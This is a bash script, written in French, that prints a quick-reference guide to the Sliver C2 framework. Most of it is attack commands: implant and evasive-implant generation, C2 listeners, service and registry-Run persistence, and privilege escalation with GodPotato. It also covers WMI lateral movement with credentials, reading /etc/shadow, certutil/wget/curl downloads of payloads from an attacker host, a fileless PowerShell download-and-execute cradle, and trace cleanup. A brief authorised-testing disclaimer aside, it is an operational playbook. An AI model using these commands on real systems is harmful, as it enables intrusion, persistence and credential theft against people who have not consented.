#!/bin/bash

# =============================================================================
# SCRIPT DE RÉFÉRENCE RAPIDE - SLIVER C2
# =============================================================================
# Usage: Source de référence pour les commandes Sliver C2
# ATTENTION: À utiliser uniquement dans un environnement de test autorisé
# =============================================================================

echo "=== GUIDE DE RÉFÉRENCE RAPIDE SLIVER C2 ==="
echo ""

# Configuration des variables
echo "# 1. CONFIGURATION DES VARIABLES"
echo "export LHOST='192.168.1.100'  # Votre IP Kali"
echo "export LPORT='443'             # Port d'écoute"
echo "export TARGET_IP='192.168.1.50' # IP de la cible"
echo ""

echo "# 2. INSTALLATION ET DÉMARRAGE"
echo "sudo apt update && sudo apt install sliver -y"
echo "sudo sliver-server  # Dans un terminal"
echo "sliver-client      # Dans un autre terminal"
echo ""

echo "# 3. GÉNÉRATION D'IMPLANTS"
echo "# Implant Windows basique:"
echo "generate --mtls \$LHOST:\$LPORT --os windows --arch amd64 --format exe --save /tmp/implant.exe"
echo ""
echo "# Beacon Windows (connexion périodique):"
echo "generate beacon --mtls \$LHOST:\$LPORT --os windows --arch amd64 --format exe --save /tmp/beacon.exe"
echo ""
echo "# Implant Linux:"
echo "generate --mtls \$LHOST:\$LPORT --os linux --arch amd64 --format elf --save /tmp/implant_linux"
echo ""

echo "# 4. CONFIGURATION DES LISTENERS"
echo "mtls --lport \$LPORT           # Listener mTLS"
echo "http --lport 80              # Listener HTTP"
echo "https --lport 443            # Listener HTTPS"
echo "dns --domains example.com --lport 53  # Listener DNS"
echo ""

echo "# 5. VÉRIFICATION"
echo "jobs                         # Voir les listeners actifs"
echo "sessions                     # Voir les sessions actives"
echo "sessions -i [ID]             # Interagir avec une session"
echo ""

echo "# 6. COMMANDES DE POST-EXPLOITATION"
echo "info                         # Informations système"
echo "ps                          # Liste des processus"
echo "whoami                      # Utilisateur actuel"
echo "pwd                         # Répertoire courant"
echo "ls                          # Lister les fichiers"
echo "download /remote/file /local/path  # Télécharger un fichier"
echo "upload /local/file /remote/path    # Uploader un fichier"
echo "shell                       # Shell interactif"
echo ""

echo "# 7. RECONNAISSANCE"
echo "execute whoami /all         # Informations utilisateur Windows"
echo "execute net user            # Utilisateurs Windows"
echo "execute net localgroup administrators  # Administrateurs locaux"
echo "execute ipconfig /all       # Configuration réseau Windows"
echo "execute netstat -an         # Connexions réseau"
echo ""

echo "# 8. PERSISTENCE WINDOWS"
echo "# Service Windows:"
echo "execute sc create BadService binpath= \"C:\\\\temp\\\\implant.exe\""
echo "execute sc config BadService start= auto"
echo "execute sc start BadService"
echo ""
echo "# Registre (démarrage automatique):"
echo "execute reg add \"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" /v \"BadApp\" /t REG_SZ /d \"C:\\\\temp\\\\implant.exe\""
echo ""

echo "# 9. ESCALADE DE PRIVILÈGES"
echo "execute whoami /priv        # Vérifier les privilèges"
echo "# Si SeImpersonatePrivilege est disponible:"
echo "upload /path/to/GodPotato.exe C:\\\\temp\\\\GodPotato.exe"
echo "execute C:\\\\temp\\\\GodPotato.exe -cmd \"cmd /c C:\\\\temp\\\\implant.exe\""
echo ""

echo "# 10. MOUVEMENT LATÉRAL"
echo "execute nmap -sn 192.168.1.0/24  # Scan réseau"
echo "execute net view \\\\\\\\domain     # Voir les machines du domaine"
echo "# WMI (avec credentials):"
echo "execute wmic /node:\"\$TARGET_IP\" /user:\"DOMAIN\\\\USER\" /password:\"PASSWORD\" process call create \"cmd.exe /c C:\\\\temp\\\\implant.exe\""
echo ""

echo "# 11. COLLECTE D'INFORMATIONS"
echo "execute systeminfo          # Informations système détaillées"
echo "execute tasklist            # Processus en cours"
echo "execute dir C:\\\\Users       # Lister les utilisateurs"
echo "cat /etc/passwd             # Utilisateurs Linux"
echo "cat /etc/shadow             # Mots de passe Linux (root requis)"
echo ""

echo "# 12. TRANSFERT DE FICHIERS"
echo "# Serveur web simple pour transfert:"
echo "python3 -m http.server 8080"
echo "# Sur la cible Windows:"
echo "execute certutil -urlcache -split -f http://KALI_IP:8080/file.exe file.exe"
echo "# Sur la cible Linux:"
echo "execute wget http://KALI_IP:8080/file"
echo "execute curl -O http://KALI_IP:8080/file"
echo ""

echo "# 13. ÉVASION ET TECHNIQUES AVANCÉES"
echo "# Génération d'implant obfusqué:"
echo "generate --mtls \$LHOST:\$LPORT --os windows --format exe --evasion --save /tmp/evasive.exe"
echo "# PowerShell sans fichier:"
echo "execute powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://KALI_IP/script.ps1')\""
echo ""

echo "# 14. NETTOYAGE"
echo "sessions -k [ID]            # Terminer une session"
echo "jobs -k [ID]               # Terminer un listener"
echo "execute del C:\\\\temp\\\\*.exe /f /q  # Supprimer les fichiers"
echo "execute sc stop BadService  # Arrêter le service"
echo "execute sc delete BadService # Supprimer le service"
echo "execute reg delete \"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" /v \"BadApp\" /f"
echo ""

echo "# 15. COMMANDES D'AIDE"
echo "help                        # Aide générale"
echo "help [command]              # Aide pour une commande spécifique"
echo "background                  # Mettre la session en arrière-plan"
echo "exit                        # Quitter"
echo ""

echo "=== VARIABLES UTILES ==="
echo "# Remplacez ces valeurs par vos propres paramètres:"
echo "KALI_IP = Votre adresse IP Kali Linux"
echo "TARGET_IP = Adresse IP de la machine cible"
echo "DOMAIN = Nom du domaine (si applicable)"
echo "USER = Nom d'utilisateur pour l'authentification"
echo "PASSWORD = Mot de passe pour l'authentification"
echo ""

echo "⚠️  AVERTISSEMENT: Utilisez uniquement dans un environnement de test autorisé ⚠️"
echo "📚 Pour plus de détails, consultez le Guide_Silver_C2_Kali_Linux.md"